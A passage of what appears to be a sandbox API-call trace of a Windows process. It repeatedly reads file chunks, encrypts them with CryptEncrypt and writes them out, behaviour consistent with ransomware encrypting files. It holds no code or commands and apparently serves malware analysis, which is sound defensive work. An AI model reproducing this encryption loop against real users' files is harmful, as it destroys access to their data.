pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.586] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.586] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.586] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.586] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.586] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.586] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.587] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.587] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.587] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.587] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.587] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.587] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.588] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.588] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.588] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.588] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.588] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.588] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.588] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.588] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.588] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.588] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.588] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.588] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.588] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.589] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.589] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.589] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.589] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.591] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.591] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.591] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.591] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.591] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.591] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.591] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.591] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.592] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.592] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.592] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.592] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.592] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.592] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.593] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.593] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.599] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.599] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.599] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.599] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.599] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.599] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.599] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.600] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.600] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.600] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.600] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.600] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.600] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, 